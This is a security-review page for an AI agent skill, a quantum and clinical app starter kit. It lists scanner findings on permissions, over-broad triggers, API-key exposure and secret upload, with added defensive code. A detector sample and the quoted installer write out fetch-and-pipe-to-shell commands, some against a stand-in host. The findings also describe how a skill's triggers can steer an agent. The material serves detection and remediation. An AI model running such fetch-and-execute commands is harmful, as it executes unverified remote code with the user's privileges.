Hackathon Quantinuum

Security checks across malware telemetry and agentic risk

Overview

This skill appears to be a legitimate quantum app starter kit, but users should review its cloud deployment and secret-handling examples before using it.

Reasonable to install for a hackathon or prototype if you are comfortable reviewing generated code. Before deploying, inspect `.env`, avoid putting real secrets in `VITE_*` frontend variables (Vite inlines them into the shipped bundle), use `--skip-secrets` unless you intend to upload secrets to Fly.io, lock down CORS, authentication and rate limits, and use only synthetic or de-identified clinical data unless you have a compliance plan.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Tool Misuse: Tool Parameter Abuse, Chaining Abuse, Unsafe Defaults
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
Findings (10)

Lp3

Medium
Category
MCP Least Privilege
Confidence
93% confidence
Finding
The skill describes and directs use of powerful capabilities including shell execution, file read/write, environment access, and network deployment, but does not declare permissions or boundaries. This creates a mismatch between what the skill can induce an agent to do and what reviewers or policy systems can pre-approve, increasing the risk of unintended code execution, secret exposure, or remote deployment.

Intent-Code Divergence

Medium
Confidence
89% confidence
Finding
The generated code hardcodes the backend URL into source files while the README instructs users to use an environment variable. This can cause operators to assume endpoint configuration is externalized when it is actually embedded into shipped client code, increasing the risk of accidentally exposing internal or non-production backend URLs and making secure environment-specific deployment harder.

Vague Triggers

Medium
Confidence
89% confidence
Finding
The description defines the skill for broad categories like clinical, healthcare, and quantum web apps without strong gating conditions or exclusions. An agent may invoke this skill for loosely related requests, leading to unnecessary use of deployment, code-generation, or external-service workflows in sensitive healthcare contexts.

Vague Triggers

Medium
Confidence
95% confidence
Finding
The trigger list includes very generic terms such as clinical, healthcare, drug discovery, and clinical trials, which are likely to appear in ordinary conversation unrelated to this toolchain. Over-broad keyword activation can cause the agent to route benign or sensitive requests into a high-capability skill that performs coding, file operations, networking, or deployment steps unnecessarily.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The guide explicitly recommends deploying with `--skip-health-checks` to work around failures, but does not warn that this can push a broken or misconfigured service into production. In a cloud-hosted backend handling healthcare- or quantum-related workloads, bypassing health validation can lead to outages, bad responses, or exposure of partially initialized services.

Missing User Warnings

Medium
Confidence
87% confidence
Finding
The guide shows a pattern for constructing and executing quantum circuits directly from JSON input without validation, authorization, or resource controls. While this is not arbitrary code execution in the traditional sense, it exposes a code-like remote execution surface that can be abused to trigger expensive computation, oversized circuits, invalid qubit access, or backend resource exhaustion—especially in a cloud API context.
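As an added example (not code from the skill or from Quantinuum), a validation layer for that JSON-to-circuit surface: it bounds body size, qubit count, gate count and shots, checks every gate name, arity, qubit index and parameter, and reports all problems at once instead of failing on the first. The wire format, gate table and limits are assumptions to be matched to the real SDK; authentication and per-caller quotas would wrap this check and are not shown.

```python
"""Input validation for an endpoint that builds and runs a circuit from JSON.

Added example, not the skill's own code. The wire format
{"qubits": n, "shots": s, "gates": [{"name", "targets", "params"}]} and the
gate table are assumptions; authentication and per-caller quotas are
separate checks that would wrap this one.
"""
import json
import math
from dataclasses import dataclass

# gate name -> (number of target qubits, number of numeric parameters)
GATE_TABLE = {
    "h": (1, 0), "x": (1, 0), "y": (1, 0), "z": (1, 0), "measure": (1, 0),
    "rx": (1, 1), "ry": (1, 1), "rz": (1, 1),
    "cx": (2, 0), "cz": (2, 0), "zz": (2, 1),
}


@dataclass(frozen=True)
class Limits:
    max_qubits: int = 20          # assumed backend width
    max_gates: int = 5000         # caps work per request
    max_shots: int = 10_000       # caps repeated execution cost
    max_json_bytes: int = 256 * 1024


def _pos_int(value):
    # bool is a subclass of int; True must not pass as "1 qubit"
    return isinstance(value, int) and not isinstance(value, bool) and value > 0


def validate_circuit(spec, limits=Limits()):
    """Return a list of problems; an empty list means the spec is acceptable."""
    if not isinstance(spec, dict):
        return ["top-level JSON must be an object"]
    errors = []

    qubits = spec.get("qubits")
    if not _pos_int(qubits):
        errors.append("qubits must be a positive integer")
        qubits = 0                      # every target index is now out of range
    elif qubits > limits.max_qubits:
        errors.append(f"qubits={qubits} exceeds limit {limits.max_qubits}")

    shots = spec.get("shots", 1)
    if not _pos_int(shots):
        errors.append("shots must be a positive integer")
    elif shots > limits.max_shots:
        errors.append(f"shots={shots} exceeds limit {limits.max_shots}")

    gates = spec.get("gates")
    if not isinstance(gates, list):
        return errors + ["gates must be a list"]
    if len(gates) > limits.max_gates:
        # stop here: do not spend time walking an oversized list
        return errors + [f"{len(gates)} gates exceeds limit {limits.max_gates}"]

    for i, g in enumerate(gates):
        if not isinstance(g, dict) or not isinstance(g.get("name"), str):
            errors.append(f"gate[{i}]: must be an object with a string name")
            continue
        name = g["name"].lower()
        if name not in GATE_TABLE:
            errors.append(f"gate[{i}]: unknown gate {g['name']!r}")
            continue
        arity, nparams = GATE_TABLE[name]
        targets, params = g.get("targets", []), g.get("params", [])
        if (not isinstance(targets, list) or len(targets) != arity
                or not all(_pos_int(t) or t == 0 for t in targets)):
            errors.append(f"gate[{i}]: {name} needs {arity} integer target(s)")
            continue
        if any(t >= qubits for t in targets):
            errors.append(f"gate[{i}]: target {targets} outside 0..{qubits - 1}")
        if len(set(targets)) != arity:
            errors.append(f"gate[{i}]: duplicate target qubit in {targets}")
        if (not isinstance(params, list) or len(params) != nparams
                or not all(isinstance(p, (int, float)) and not isinstance(p, bool)
                           and math.isfinite(p) for p in params)):
            errors.append(f"gate[{i}]: {name} needs {nparams} finite numeric parameter(s)")
    return errors


def rejection_reason(raw, limits=Limits()):
    """Size-check, decode and validate a request body; None means accepted."""
    if len(raw) > limits.max_json_bytes:
        return f"body of {len(raw)} bytes exceeds {limits.max_json_bytes}"
    try:
        spec = json.loads(raw)
    except ValueError as exc:
        return f"invalid JSON: {exc}"
    problems = validate_circuit(spec, limits)
    return "; ".join(problems) if problems else None


# constructed request bodies, not captured traffic
GOOD = json.dumps({"qubits": 2, "shots": 100, "gates": [
    {"name": "h", "targets": [0]}, {"name": "cx", "targets": [0, 1]},
    {"name": "rz", "targets": [1], "params": [0.25]},
    {"name": "measure", "targets": [0]}, {"name": "measure", "targets": [1]}]})
BAD_INDEX = '{"qubits": 2, "gates": [{"name": "cx", "targets": [0, 2]}]}'
OVERSIZED = '{"qubits": 500, "shots": 1000000000, "gates": []}'

if __name__ == "__main__":
    for body in (GOOD, BAD_INDEX, OVERSIZED):
        print(rejection_reason(body) or "accepted")
```

Note that `_pos_int(t) or t == 0` is deliberately not `isinstance(t, int)`: `True` and `False` are ints in Python and would otherwise sneak in as qubit indices 1 and 0. Negative indices are rejected there too, so the later range check only needs the upper bound.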

Missing User Warnings

Medium
Confidence
97% confidence
Finding
The document instructs users to place `VITE_API_KEY` in a frontend `.env` file and inject it into client-side requests via `import.meta.env`, which exposes the key to any browser user at build/runtime. In a healthcare/clinical quantum app context, this can allow unauthorized API use, quota theft, abuse of paid quantum compute resources, and potentially broader access depending on what the key authorizes.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The script automatically uploads all key/value pairs from a local .env file to Fly.io as secrets without an explicit consent prompt or strong warning that credentials are being transmitted to a remote platform. In a healthcare or clinical deployment context, this increases the risk of unintentionally exporting sensitive API keys, tokens, or regulated environment data to external infrastructure.
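Added example covering the two findings above (the `VITE_API_KEY` exposure and the unconditional `.env` upload); it is not the skill's deploy script. It parses `.env`, refuses to treat a secret-looking `VITE_*` variable as deployable, sends nothing to Fly.io unless the operator opts in, returns the `fly secrets set` argv for review instead of running it, and scans the built bundle for values of secret-looking variables. The sample `.env` and bundle excerpt are constructed.

```python
"""Review .env before any of it reaches the browser bundle or Fly.io.

Added example, not the skill's own deploy script. It assumes a dotenv-style
.env, a Vite build output in dist/ and the real `fly secrets set NAME=VALUE`
command; the command is only returned as argv, never run, so the operator
sees exactly which names would leave the machine.
"""
import os
import re
from dataclasses import dataclass, field

FRONTEND_PREFIX = "VITE_"   # Vite inlines these into the client bundle at build time
SECRET_NAME = re.compile(r"KEY|SECRET|TOKEN|PASS|CREDENTIAL|PRIVATE", re.I)
CREDENTIAL_URL = re.compile(r"://[^/\s:@]+:[^@\s]+@")   # scheme://user:password@host


def parse_dotenv(text):
    """Minimal NAME=VALUE parser; surrounding quotes on the value are stripped."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        name, value = (part.strip() for part in line.split("=", 1))
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        env[name] = value
    return env


def looks_secret(name, value):
    return bool(SECRET_NAME.search(name) or CREDENTIAL_URL.search(value))


@dataclass
class Plan:
    upload: dict = field(default_factory=dict)   # name -> value to send to Fly
    skipped: dict = field(default_factory=dict)  # name -> reason
    blocked: dict = field(default_factory=dict)  # name -> reason; fix before deploying


def plan_secrets(env, upload_secrets=False):
    """Decide per variable what the deploy step may do with it.

    upload_secrets=False is the equivalent of the guide's --skip-secrets:
    nothing leaves the machine unless the operator opted in explicitly."""
    plan = Plan()
    for name, value in env.items():
        if name.startswith(FRONTEND_PREFIX):
            if looks_secret(name, value):
                plan.blocked[name] = "secret in a VITE_ variable; it would ship to every browser"
            else:
                plan.skipped[name] = "frontend build variable, not a backend secret"
        elif not upload_secrets:
            plan.skipped[name] = "upload not enabled by the operator"
        elif not value:
            plan.skipped[name] = "empty value"
        else:
            plan.upload[name] = value
    return plan


def fly_secrets_argv(plan, app):
    """argv for flyctl; print it and confirm with the operator before running."""
    if plan.blocked:
        raise ValueError("blocked variables remain: " + ", ".join(plan.blocked))
    if not plan.upload:
        return []
    return ["fly", "secrets", "set", "--app", app,
            *(f"{name}={value}" for name, value in plan.upload.items())]


def find_leaked_values(env, files):
    """{name: filename} for each secret-looking value found in built files.
    `files` is an iterable of (filename, text); scan_dist() feeds it from disk."""
    leaked = {}
    for fname, text in files:
        for name, value in env.items():
            if looks_secret(name, value) and len(value) >= 8 and value in text:
                leaked.setdefault(name, fname)
    return leaked


def scan_dist(env, dist_dir="dist"):
    def walk():
        for root, _, names in os.walk(dist_dir):
            for n in names:
                path = os.path.join(root, n)
                with open(path, errors="replace") as fh:
                    yield path, fh.read()
    return find_leaked_values(env, walk())


# constructed sample .env and bundle excerpt, not real files
SAMPLE_ENV = """# backend
QUANTINUUM_API_KEY=qk_live_0123456789abcdef
DATABASE_URL='postgres://app:hunter2pw@db.internal/app'
LOG_LEVEL=info
# frontend (inlined by Vite)
VITE_API_URL=https://api.example.test
VITE_API_KEY=qk_live_0123456789abcdef
"""
SAMPLE_BUNDLE = [("dist/assets/index-abc123.js",
                  'fetch(u,{headers:{"x-api-key":"qk_live_0123456789abcdef"}})')]


def review(env_text=SAMPLE_ENV, bundle=SAMPLE_BUNDLE, upload_secrets=False):
    env = parse_dotenv(env_text)
    return plan_secrets(env, upload_secrets), find_leaked_values(env, bundle)
```

Run `review()` against the sample: the `VITE_API_KEY` line is blocked, nothing is uploaded because consent was not given, and the bundle scan reports the key under both names because the same value was copied into the frontend variable. `scan_dist(parse_dotenv(open(".env").read()))` is the same check against a real `dist/` after `vite build`.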

External Script Fetching

High
Category
Supply Chain
Content
```bash
# 1. Install flyctl
curl -L https://fly.io/install.sh | sh

# 2. Login
fly auth login
```
Confidence
98% confidence
Finding
`curl -L https://fly.io/install.sh | sh` downloads an installer and pipes it straight into a shell. Nothing is pinned or verified (no version, checksum or signature), so whatever the server returns at install time runs with the user's privileges, and the user never sees the script before it executes.

Chaining Abuse

High
Category
Tool Misuse
Content
```bash
# 1. Install flyctl
curl -L https://fly.io/install.sh | sh

# 2. Login
fly auth login
```
Confidence
99% confidence
Finding
The `| sh` chains the download into immediate execution, so the fetched content can neither be inspected nor checksummed before it runs. Downloading to a file, reviewing or verifying it, and executing it as a separate step keeps the two operations apart.
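Added example of the check behind these two findings (not SkillSpector's own code): a detector for fetch-and-execute lines in a skill's instructions. It flags the plain pipe, pipes through intermediate stages, `sudo`/`bash -` suffixes and the `sh -c "$(curl ...)"` form, and notes fetches over plaintext http. The sample guide text is constructed around the command the findings quote.

```python
"""Flag 'fetch a script and pipe it into a shell' lines in a skill's docs.

Added example of the check behind the two findings above; it is not the
scanner's own code. The sample text is constructed.
"""
import re

FETCH = r"(?:curl|wget)\b"
SHELL = r"\b(?:sudo\s+)?(?:ba|z|da)?sh\b"
# curl ... | sh, including curl ... | tee x | bash and ... | sudo bash -
PIPE_TO_SHELL = re.compile(rf"({FETCH}[^\n]*?)\|\s*({SHELL}[^\n]*)")
# sh -c "$(curl ...)"  (command substitution instead of a pipe)
SUBSHELL_EXEC = re.compile(rf"({SHELL}\s+-c\s+[\"']?\$\(\s*{FETCH}[^\n]*?\))")


def find_pipe_to_shell(text):
    """One dict per offending line: line number, the command, how the script
    reaches the shell, and whether the fetch used plaintext http."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m, via = PIPE_TO_SHELL.search(line), "pipe"
        if not m:
            m, via = SUBSHELL_EXEC.search(line), "subshell"
        if not m:
            continue
        hits.append({
            "line": lineno,
            "command": line.strip(),
            "via": via,
            "plaintext_http": "http://" in m.group(0),
        })
    return hits


# constructed excerpt of a skill guide; line 3 is the command the findings quote
SAMPLE_GUIDE = """# Setup
## 1. Install flyctl
curl -L https://fly.io/install.sh | sh
fly auth login
wget -qO- http://example.test/setup.sh | sudo bash -
sh -c "$(curl -fsSL https://example.test/tool.sh)"
curl -fsSL https://example.test/tool.tar.gz -o tool.tar.gz
"""

if __name__ == "__main__":
    for hit in find_pipe_to_shell(SAMPLE_GUIDE):
        print(f"line {hit['line']} via {hit['via']}: {hit['command']}")
```

The last sample line (download to a file) is deliberately not flagged: separating the fetch from execution is the remediation the findings call for, and a checksum or signature step can then sit between the two.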

VirusTotal

66/66 vendors flagged this skill as clean.
